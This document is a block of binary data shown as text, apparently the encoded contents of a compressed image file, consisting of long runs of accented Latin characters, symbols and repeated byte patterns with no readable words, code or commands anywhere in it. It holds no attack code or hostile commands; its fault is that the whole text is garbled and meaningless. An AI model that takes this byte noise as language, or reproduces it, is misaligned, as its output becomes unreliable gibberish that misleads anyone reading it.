          š|,8«©4%Hu$TŠ€j:Áìë¢^½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî©£çwüÏÿðÊÀîV_Ú¸~Ϫž‰·z÷[ptüɎ¢ÿÄa°÷”ÄûŽ®¿Ü«Ÿù¨ßá=¿ÆßièOöÇUëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺(ÿ2·ëí>­]¿G?‡%¾²t’$J$ZÌÓ¡ôÊLÎ-Ìu-ìÿ—m|{ï…R!_öÇü§òéè¯SÀuQ¾oõ¿Ûcüüú[×¼ßë¶>ýŸŸ^ëÞoõ¿Û~Ïϯuï7úß폿gç׺÷›ýoöÇß³óëÝtÒ+«#…e`U•—R²°±Và‚#ߨz÷AÞ7oQ®èɬ“ÔTãq”X3ÅÌA¢¤¸ÌUC-‹Ôŏ–RÔÈä¤!Àøâ(ÐNóÇH·ü]z¸èEó­þØûw?>½×¼ßë¶>ýŸŸ^ëÞoõ¿Û~Ïϯuï7úß폿gç׺ïÍþ·ûcïÙùõî®cãGNSuvÇ¥¯ÉR Þ{¢šŸ!žžDÿ(ÇÓÊ¢j,e…âJÜÀýu%®J¬zc­ëqkë–Toñd4_Ÿ«~~_/Ϥ2¾¶ÇÂ:2>ɺk¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî™w'ü{¹ïûRå?÷wO>Ñׇ֝^äC£n…^—ìæêÁÅoµÂÀq”ÙJa‹l‰Å	ÿ‰cª(5ýè¡È˜ü?q®Þ&Õk\^þèôe#¯tv?áÅfÿŸCþ‡oÿØw¶¼!ü]n½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz³^¸Ý‰¾öÍÞqҊ¹öÖ6ô£îÅÙ
          j'¢^¹“»GäñǯMô­ì9Aî%ŸÐsï:ZRŠ›¥Õ?ҙœ¯üdŽºÛíÍç×ûÉ7d՟jµ¯úa
          ÿÒÓØ7¡§U›üÂ~Q|Û2ö'^ÐÒÑ÷vÕǧDñSCØXJDiÛÉÌÅ"LÝ*ßøe\„Çíæa¤”ùìO¼Ó{¸®Ã¿LÏÉ×2g‰6²6<T|3þŒƒþj Ô
          ɏ>ùû7?mÍ¿lPªs…´xàÔkþ„çÄèNqþ†ÇIšÐmÙ¾z{b÷VÚ­Êm
          ù±³-4­”™VW4”µ¸ü
          J)(֒š²’t),m$2¡Ve=
          Ý6½›šö;³p†;­–öPÊèÀdaù::š‚”‚ëŸ^ç¼ò¦÷m¹móIk½YÍPhU‘ԐÊÊ4taB+	nðkæfÔù?ÖÔù˜š—»°¿kŽì
          ¤³“nææ¼y<zJíQ6×Ï^ZIX¶‚¯1–/Ìt½µÜý°æ'Ûn5K±ÎY­g#€åXŒ	c¨.8‡+ºQíß?mžéòâîÖabæpêr¯L2ƒ“”&6Ï„–CՀ‚ƒÈ#AüqÏB®½ïÝk¯{÷^ëÞý׺»'©ú׸p	µûKdmÍù·â­‹#+rã)òT´õð$‘ÅYL&Rôõ)¬ºÐ«ib/b}›ì»þ÷˗‡pØwYí/t•/”b¦•RA€hqP—E»®Í´ï¶¿C¼í°ÝYê
          ¢TW]B´`R¡#Ìô§Û›s´08¯µ°øí¿·04ؼ.I
          3Ž£a¥£¢¤§T†
          xcPTíååÖáuq}}ró^LåÝܖwf5ff5$“’OK-­­ìíà´´"µ‰¢ 
          ªª(ªª(@:zöŸ§º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢ûò£pm]™ßûGiå–ÛÔ¿{Û±äÎ*¦¿Oꬩ£qÙ6ž²†œ"2Ó*•K½Èo`}È­½ÿVw{€¼¿¸H4³Cphªõà\$„àŽYUZ°?¾žÝkÙ?¬;T¹ƒoŒ’ª35¸«:z—2FH2 Δª_øqY¿çÐÅÿ¡Ûÿöï>¼!ü]`•z÷ü8¬ßóèbÿÐíÿû÷ï^¯^ÿ‡›þ}_ú¿ÿaÞýáâëÕëßðâ³Ï¡‹ÿC·ÿì;ß¼!ü]z½{þVoùô1èvÿý‡{÷„?‹¯W¯ÊÍÿ>†/ýßÿ°ï~ð‡ñuêõïøqY¿çÐÅÿ¡ÛÿöïÞþ.½^½ÿ+7üú¿ô;þýûÂÅ׫׿áÅfÿŸCþ‡oÿØw¿xCøºõz&ýëÛ­Ý{áw›`m•ÂÐaÿ‡.PåÁûjåû»8üaýߺ¶§OÔ߇h­t
          {µO^ën‘ÿ™1Ô_øŒ6þò˜Ÿqí×û•sÿ5ü'¢·øÛí=	þØê½{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷_ÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺©ï›‘ë{7om䐚m½´á£ÕaC7_W5Iý®†Ž“Ÿðö;åˆtÙK52ò ?™=+·B~}/7øÿÉÞÄ´ùtÿ^óüïÔùuî½æÿù;ß©òëÝ{Íþ?òw¿Så׺NÓdjquiŒÊLÓÁU#.#+!U31»eyP¨µñ¯ù§°?ã !¨*§KüŸoøzßJ/7øÿÉÞïO—Zéƒ-ó;‘ïô©ÆAú¾ž<]<Öÿ՛ÿ±÷EϏOðu¿Nªò4ÔÒÕÕ̰Sº¤‘˜ñÈ
          ªª<ŽÄ*ª‚ÌÄ	 {±¢‚HÇZê2«'TóWVƒEM2¢ÐâØ'ÜC%¾ê¾[3-d÷ÿ2§D*,u=È҆9"ƒÓ­ôñæÿù;Ý©òë]{Íþ?òw¿Så׺¾?í¨·§rlLbj93‰“®‰ýQÍE§¨ÎÔÁ("Æ*˜±Æ6þ¡íõ>Ë÷Y¶Ýw(Ãi û[´‡ªHÚQW¹î/é^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷L»“þ=Ü÷ý©rŸûƒ?»'ƟhëÈëN}cüß±÷$i=uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uícüß±÷í'¯uÖ¿ðÿyÿ{öŸŸ^ëÚÿÃýçþ5ïÚ~}{¯kÿ÷Ÿø×¿iùõü?Þã^ý§ç׺ö¿ðÿyÿ{öŸŸ^ëÚÿÃýçþ5ïÚ~}{¯kÿ÷Ÿø×¿iùõü?Þã^ý§ç׺ö¿ðÿyÿ{öŸŸ^ëÚÿÃýçþ5ïÚ~}{¯kÿ÷Ÿø×¿iùõü?Þã^ý§ç׺ö¿ðÿyÿ{õ¯^ëÚÿÃýçþ5ïÔ½{¯kÿ÷Ÿø×¿Pzõü?Þã^ýAë׺zã/}|œÜ5g£:Ëpïêúe«(–ƒoà’¤°§|þèÌTc¶îînbZš¨Þm
          ãV*@*Ýw«e„O¹ß$Hx–oôª*Íó ÇŸWHÞCDZõd´_ȏç5V=+'“¥ñµŠÍ‰­ìŒ™Ë˜ÞLvÓÈbË¡àé©e¿ÐŸ`Ö÷C–ʏ©aê#þnòéGÑMòý½®ðþY?6z_¸÷¯IærÛOÕuû«`×â÷æ&†Š™ZJªü•>Ûª­Îa±ô±!y*+héáDä°ØólçNZݤHm·5YØÐ,€¡'È
          @)? Ié··š1R˜ùg¤[|ùÜ'ØýgлÓxl}Ël¸-Nj8°ÉGŽÉVáëZŸîrtóڟ'šԋëŒÛ‹jï9£—¶û™lïwXã¹JjSZŠ€GèAê«®*§¤'v|\ùñÆ
          »UÞW¸úâŸv͓ƒnKž8ý9i°ÉC&R:o±­¬:¨Ó%}Z΋_›*Ûw½£x3.Ù~“é«MqZÒµìꯑÓZ‘^°ôÆ>ýù!ýçÿAÝ_¸»#û™üûÑüиoïñoàŸw÷ՔñqþWãÓ«üÃ^Ü_{žõ´ìþï;ä‡Ä®UΚV”†¡ûzòG$•е§B'bü
          ù‡Ô»/;؝Ð[×il±OOUžÜY3‡ûe=Um.:žZ¶ÊO6™k«"ŒiF:œ~=£³æž]¿¹ŠÒÏvŠK—4U© 'Ìz՚	ThÈ¢•IOU_UMCAKQ[][Q
          %$RTÕUÕTH°ÓÓSS4õÊáQf Iö~ÅYÝÀP*IÀÔô×V“Ôßɳçwjái7½w‚ënB$ž„v¶çƒmeæ†E£lã©3۟âö1WQÒÌ?ÔZÇØÿÜNV±‘¢;Ž>êïDªŸö¤Ž”­¤ì+¦ƒçÖnÎþL¿<úÛS›¦ë­½ÙTTQ4õquŽî¡Î壉i¶öZ¿¸2ҝ ¨©jfbÂÈy¶¬½Åå[ÙMxð±áâ!Qþô5(ûX×šÒuÓ_³¢á²—ßÍÅÛ8íá³>;oüÞÜʾB*ŒtøÚ?$؜n'O-&G#G]KSA•ÇOO,rϒÄÊ@#ÙÍÏ5òݜÏos¼D³-*2x€F@ ÔEÓb	˜TFiÐaÝßû÷ã÷cý8õ~âëïŸñ¯î¿ñóAþ滿ý§ØÖVÅ»øí'“VŸóëkóe»fõ´ï?îËä›Ã¦­5ƪҵŽ“û:«Ç$tÖ´¯YºOâçÈ?‘Ðn*®ê½ÇØôûJldŽ\	ÇéÄ͙Jé1qÔýõmÕX˜ÙÊiÕþhÞÜ_[–÷´læÜïÒ%tê®iJҀð¨ý½y#’JèRiЕ½ÿ—ßÌþ¶Ú;‡~oŸ{ãmí
          ©Œ¨Ìî,õyÃ}–+H¡ª+*|Y¦ñD¦çJ±ÿhí¹¯–ï.!µµÝâ{‰Š¢µ$ùpêÍÊ4fƒ¦•øEòÏä=%.O¨z#}î|
          itÔÐÓ퍟Wê*ƓwîÚ¬Ú«ñ:ÄUNS‹qww.eØ6†dÜ7X’QÅAÔãíDÃóy!–L¢:<¸ä]ó¿1N“dh:“jHÀ¤Ïö'ÜÔGôáÛká7%)#ý¦VÃûÊњ#ÜH=V?ú©þ]<,§>ƒóè#î?å)ó'§2»+S¶¶‡`nÁ®ÍPí|[nvÍeëŽÝľo5Th³XÝ»$TXìz’CÀgEú°öa·sï.n1ÜÊ'’¡³H´Q ²O—T{Y@Iôè<åóåþ1vTRÌmáT\Ÿø½~ö¯úéʇ¾âÿÐ=Wé§ÿ}žˆv³þï¿ØûÐzôÏ^ÖÃý÷û~ õëÝ{Yÿ÷ßì}úƒ×¯uígü?ß±÷ê^½×µŸðÿ}þÇߨ=z÷[|@ÉÿøãÖ%µ4Ì®5¹å„n<Î-þE£¤[…½óßK?¢÷_œ"
          4rÎX"ÿ6?Ÿ]Eö"óë}¦äéI©XdþqO,cù(üº2~âN¥Þ½ïÝ{ªfþeß"ìvWä/QbU7ö*˜TöÕÇÁfߺdXÿ¼ºx—÷7n2h”jÈÓ¯§ü¦5ZŒ³û¾{Ûý^šÛ‘ù¶î›¦Úw8¶v?Ù9< r{Xâ&9ý6&<PûÀ{&y†+žwå;JïÑ®«˜fáfTŒèrŒÊ£¨ IG=ßëãfa;/aÕè®Ç?ÚæpÕH¸­Ñ€žX›%·³1Gþr޵bR¯bôó¤sGi#R33ž9+eçþ]¼åíê*à ¬r5Ã(D±Ÿ&Zäpe,ÚǬ7äŽtÞy˜lù‡e–“Fi$dDH׃øZ˜<U‚º÷(ës/Œ$6/È~µÀo­™óc2‰öµ2GüWlgàŽ#‘ÚÙȐŸuʾ6ýBñËh¤-yǔ7®BæÎ[ßb¥Äf¨âº%Œ“¢XÉâ­OµX25H.åÞdÙ¹ó—­y«—¤¬
          K¦¸¤kGƒ-säÊUÖªÀ“Aì7ÒÞ½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺âè’#Ç"«Ç"²:0®Ž
          ²²ž
          ²›ïÝlGµâù×ñµúW°wmš]oºÊŠª§’—ogäòT×`IKÁ
          =@QH£@‰#TT…KtØOrÇ9l?¸7{Šó&ß±«O¢¤¹Éd4ŽRjIÐ剐‚^ú{r9OzôۅåÝÂBt¨¢ÁpjÏ0Ådˆ
          5Ɓ$CYÿ÷Ÿø¯¼€íõêëÚÏø¼ÿÅ}û·×¯uÖ³ýÞ=û·¯uígúÿ¼ø§¿võÿ_÷ÿ÷îÞ½×µŸëþð?âžýÛ׺ö³ýÞüSß»z÷^Ö¯ûÀÿŠ{÷o^ëÚÏõÿxñO~íëÝ{Yþ¿ïþ)ïݽ{­¹ºGþdÇQâ0Ø?ûÊb}Ǘ_îMÇüÔoðžŠßã´ô'ûcªõï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺¤˜UÏ7È]ó)GÖ¥ˆzSû£ƒ¨`?ÃÍPçý¹'—Ô
          ¦Ôӎ£ÿn–ÃýšôY<ßëÿ¶ΩòéÞ½æÿ_ý°÷ê|º÷^ó¯þØ{õ>]{¯y¿×ÿl=úŸ.½Ôz¸©ë©å¤«ˆMO2é’6pU•ŽŒ+)¬½F:÷Lô™
          œmDX¬¤¯2JÞ<VV@£ïŠ*Ö*dãAÁájj[0eR¿#þCóÿ^ë.B
          ÕYU/вôªÌF¢OðˆãEä–G”**‚ÎÄ	 {Т™Iá_ò·éÖJH*r5erÑ´B2bñO¡–†à…¬¬
          JM”t?Ô­:)vÔí°¥Ž¦`ôÿg­t ó¯þØ{rŸ.½×¼ßëÿ¶ýO—^ëÞoõÿÛ~§Ë¯tmþ›½ñlÿª
          »¸æŽà~³D°[è|s7ûdɍ­ñÅ×ü=3?ög«œ÷ô¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¦]Éÿî{þÔ¹OýÁŸÝ“ãO´uáÄu§¹£n½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺ìÄ*‚ÌÄ$’M€rI>ý׺ú&üQøï³þ-t?_ôîÐÆQѝ¿ƒ —ud©á*·Fö«£§}Ó¹ò•
          <•u™Lš¾‚ìÂ
          dŠíQªâ6û»Üo›¥Þápäëc¤y*Ú£ÐûMIÉ=Eè­ü½þj¿þö-UoÜGeoí&žÊãºû€­§ÛØÜ¡•±ã+]¹wFاl…m<^hà§3Ú&V‘£Ô¡9‘·Žb³këY!ŽÛQPdfˆã@ªØ*ižé¹nc…´°$üº!?8ÿ›çÇÞÓøS¿ð7fv.ÏìùizÒ·iî,nßÝ{Sjn*z¹w~r«CUá+hª¶íøÅ–ƒ!Rb©ÈÆÆÚ}ŠygÛýÚǙ-%Ý _¢‚²V¬ËM
          80:ˆj2Š…=15ÔmÏqÇVü¢?íÝ¿íYØ_û÷{ØSŸÿånÞ?ÓGÿV£éû_÷?Ïü'ªÓÿ…dzñCþ×½Åÿºþ·ö3ö‹ûmûý,?ᓤ÷ü"üÿÉÓü'7þçÿ-ïÿ›‡·=Þÿ{þoÿÖµaþ‹ù—«\þlöï_’ßølmýø›;Ø‘?åmÙ¿Ó·ý[~•]a'Ùþ^«‹ù|ÛŽ¿ƒæ/bà©r»ÏvWeqÝ7N™'‹im|E]F+¼( Oƒqn<½5M4é×O§Õé¬bÿs9ši.Ï/YÊVÚ0ÔüLEBè¨ ‘æÇ?é=œ /ŠÃ'‡W½ÜÏÕݱr}•Ü;Ó±6V&H ªÍeÞvóVUkû\n3C^S3•ª¹Š’Ž	êdTb¨B±~ß·_n·Ig·Û4·-ÀAĒhd>}-wTRÎh:­Ñþr_Ðoqn®œíŠlïgí}}‘´3›Wuí¬†otå&۟æÁãi3tXüÆF*ºØ)䒢*
          y¤xÕ·±·œÃûÏoƒq°+dò
          n¬¬GsWK¤€B’(X^“µÜZ£wއåY[Y’øñÓ#ªž¶¿!‚ÝõµÕµR¼õUu•]•½'©ª©žBÒM=DÒ3»±,ÌI<û+ç•Tæ­Ý@@È¥W¶þÂ?õyõS?ð£/û“¯ü¸OþaþǞÐÿÎÃÿ6?ë7Ioÿп?òtûÿ	Õÿgåý¯zwÿuý‘í¿w¶ØÒÍþú݇	/òõo_ÌoþÈWå7þ!íÕÿ¸éî?åùYö?ùè_ðôªãû~Σ-Ÿû!‹ø‰ðõ²«Ý¹ËþVïþkŸòuëì#û:tùMóÓã‡Ãª­­î­Í™¡Ëï2ux<FÜÛy=Ç[%&!èb®ª¬j(Å>4“#EšT’[’ŠÁX†ö>VÞ9…g}¶1Æ@bÌTրW'à1×¥ž8©¬äõXuŸÌ§ã/u0O‹{¯oö¶+ӝkÓÝ×>{toè«:ÿŠß;ú–<oð*çÝPâᨮ\nÔ¡x^žûÍÈdò¢W“w­·•7¸%±gÜ&¸‡J¥$%×PÓ\Ušµ¡ÅH¥:Oõ¼ñÝ€8ÉêÌ*?˜wÂz“QŽÆüŽë¼õ{Á2¥Ù­¯Ý5R#ƒnãòrIrméŸ`ÁÊ\È(ï³Ì‰^,øÑ(ñáÿ~¾žò³¢>½ïÝ{¯{÷^ëÞý׺÷¿uî¯'à&Oïþ>ÑÒê¿ð]ݹ±–¿èòÉI˜Óþþ-ö>ù×÷˜´úos皟îE¼Ÿ°4_õ®ŽýØï>§Úè!¯û}qÙR²ÿÖZôu½ãïY×½û¯t‹Þµ¢*hTúê¥8¿û¦‘øÕ1[ÁO¶å8¥V©W/ä:××ù„|+þ&c¿º›þâ¦y²=—µ1ÐqŒžF2UoLE,KÿÙܗÉB£üÉ©ÄÓs‹îéï‡Ö-Ÿ·¼ßyþ6 %•ߌ-´Œ…Æ?H÷„ׄ?xÏc¾¯}Ãå?ñF%ïmÐfNZæ5€œÎ£à?ª;è(~Xæþ+öÅV¢¦²«¬·\ôxžÈÛñ•dÆù)·&>˜\æÚyÚh´€ÓÀe§º‰C¬éï¶6~årÄÖÑÆ‹ÌvªÏi)Å•11ÿ}Ë@§É[L”:h`gý̼öߙ¢¹’Fn]ºeK¸†j•Ī?ߑT°þ%ԘÕQ¹öÊÜô«Êcëé²t•”4Y
          •$ÉQK“Å×Ó¥V;%K<e£¨§«¦‘Y]Io£|¿’)í¦žÒî&Žî(ꌬ¤«+AäG]¹H`½²•^Æt)ª•`#ASæJÿzé'^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ}¿Õ»s¹:ûpì
          Í’‡3FéOR–8܌_»ÉÒHA	SEV‰"Ü2¶eeº‘+s.çÊ;öÛÌ;Lšo-ä­Âêpñ¿ª:’­L€j`&æƒm杗qØ7xõXÜǤ‘ñ#¤‰èñ°¾DŠ0*H:ºöo]î.¨ß‡anš_o×IJò aO_J}tY:6nZ’¾™–D½™up®¬£¨|©ÌÛo8lo0í/[K„®“ñ#Œ<oèÈÀ©ò4Ô¤©óSšùgräýÿqåýÕº·zˆr’!óI†bºX±AÞ½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî¶ééù“EÿˆÃ`ÿï)‰÷\ÿ¹7éÛü'¢·øßí=	þØê½{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷_ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺£™µ/ȝøÌ=5QmZ˜É6ºŸúÞh°÷%òñÕ´ÚüµøÛt¶ì×¢Ãåáÿ%{:¡ôéÞ½åáÿ%{õ§^ëÞQþòW¿Púuî½åáÿ%{õ§^ëÞQþòW¿Púuî£ÕEM[O%-TK,­[èC++-™$F•”†V‚÷¢ºc¯t“Âc4ås3WÕˑz,œf'ШŒp¸´ZÉ™«þÛLFB8ÒÌ¡K·¶cN÷ÔI ÿ>¶O–žQþòW·è}:×^òðÿ’½ú‡Ó¯uï(ÿù+ߨ}:÷^òðÿ’½ú‡Ó¯tj~äғä&сˆQ“ Üô'‚Ãnd«Õ×f¡²>bBÛMÁ§ÂTÿƀÿ/MMý™êï}ÆÝ"ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^é—rÇ»žÿµ.Sÿpg÷døÓíxqiÃîFèÛ¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî»÷î½×ÐàŸÌ=ó£6®òÀgqïØ8Œ&'Úû5ªb\î×ÞRGO’¨Ÿ_î[œ¬‚Jœm`ˆAa<SÅ)óG/]òöç=¼±¤f&'§k%j3ÃRŒ0âȂO!•e@Aîóè;ù«ü²~?|Ø®¥ÝÛº]ñ;Oˆ	AØ{:jO=n:–IæÇÐnœJ
          Œnࢠ–¦C!¤­
          Þ1R#U@¯–ùÓuåµk{p’سTÆõÁ<J°Ê“O˜óÓ^«5ºM“†õëW›?ʳäÃJ
          ñQ6?µzn*¨©äì}§GUG6ß5S­5
          S-]^ÚûڇX㨊¢»ätªVi6›9kžvžbe¶Á¸Óû6 ê¦N†Àjz­J4ô]5³ÃÝÅ=ÏÖϟÊ#þÝ×ñ»þ՝…ÿ¿w°=¼ÿÿ+vñþš?úµF6¿î<ŸøOU§ÿ
          *ÿgâ‡ý¯{‹ÿuýoìgíöÛ÷úXÃ'IïøEùÿ“¦/øNoýÎ/þ[ßÿ7n{½ÿ:÷üßÿ¬=jÃýòÿ/V¹üØ?íÞ¿%¿ðØÚÿûñ6w°/"ÊÛ³§oú¶ý*ºþÂO³ü½¿‰;b‡eüZøçµ±Ñ$T¸^êêOÛDÕ?ܼ4µÕmýe®®’Iœþ^B>É÷ùÚç|Þ'sÜ×2ŸøÙ ü†:¼B‘F?¢:×cþ3ØùڞÔè.¢sŶp½—ìy(QÝ)ks»›qä6Ì5uQ‚#¨ŸÚN3aZ¹‚ØJח}¥³‰lw]ÃHñšQ|ª† ûKçփӤìu"yR½k¥î]é[oüþdß
          ¾6|è-•Ù½¹OüÀm­ÅOcí½½¹·Nᤨ©ß«!OKYüSˆÆTMEUеutà«©¿>àNfäîbÞyŸu¹²°?Jî´veU4E59@ôi
          ÄQŸºœ?>ªù±ÿ0.¥ù͓éJn¥Û;ó	Œê_ô–µù=óCƒÆK}ðv¥|^?Ï<4ôcgJYª$ŽG§í©=Žù•/ùa7&¿š&{:5Ö¤ªäëòôãÒk©ÖbšA ¯:Kÿ-~Ðùý²è»ck|êìnù“vWlÙ÷Æ{'·è²mš¬e>å‡nB3{ƒqඖøŒy
          Æ+X%i|]*wùÊ˕nZÂ~f½h„aô(b5§Wj«9¥
          R½jݧ„+Zñèúü”éÏç¹>8÷ýù1ßÛ#lõŽßؙœ¾íêü4ûVÆ{
          OÉQðõ¾ÅLT5ÒíQš“þC@¶Í¸ûyñ·ZìÛT¯zò€’TSü_¨ú‡ä="]˜Ý¤pœ?â‡BoÃåUˆïo}1ØÝ¥ò«äVÚÞ'šÆu–Ï݉·vÎ× çXpC5ýï§||-û´`‚tª}}¢æ.y“kÞw;ŠÌM„u3â4џ´ž­
          °xњV¡: ?Îá—E|:Ìô¥0ÙÚï¶°«÷^Oqnl®ãÉfªð¹
          §6il¢† Lœ÷°@$2]ÃYl*öû˜·Nau“r‘O†Ñ…
          ¡B†
          ^<zbꈠAƽ?ɗlm­Ýó»ca÷^ÞÁî|ClÎÅ«8½Ã‰ ÍcU&Ù©––¤Ðä©êiE4£To§R7 ƒíg¸³ÍoÊ÷2A3$ž$bªH4-‘QCžµh™A=nÓM†Ãà±58LV7D”Óh£ÅPÒãéRÑ0ié"†°þƒÞ6™$–@ÒÈÌÕâI'ùôo@_4y—Ð{¯{÷^ëÞý׺÷¿uî½ïÝ{«zþ[ێŽmØ;GîPWã·U.ãŒÀHÔy¬E0ÔD„ÝãIð:\‹„,—¶¥¾
          ýëö©ãæ.Wß<#ôÒÙ4¼µE+I¤Ÿ"DÕãF§Öv}Ò÷h$åÎiؼQõQ^¬ú|ôËǨ044áU¯ՒûÄÞ²Û¦]ŸpÛO•Ü»‹!O‹Âah¦Èd«ê_DTôÐ.¦?–’G6XÑAy$`ª	†Õµßï{–ӵڴۅā#E,Çüq$Ð(’'¢ý×uÛö=¶÷wÝn–ºÞ2ò;Uÿ	<
          –bHVoUü¸ÿI½©¹°[ŒÜ¹Rýuæ(COOt”»zºE&6«ÉAN*¯cY$±‚D‘*䇺¾À?*òVÍ¿ìlÓÞXÛéÜ©×V.׎!cf(ÃÊ Ž@Ñ#pöï5s¶õ˻ꭽýÆ­¸š
          P‚ÞCÀ¼Š¡ÔùÌ]:ãPq¥Š9£’£Ia•)b•HåŽE*ñȌ
          º:’ ‚¼UVdetb‚0A>Du–ΊêÈê
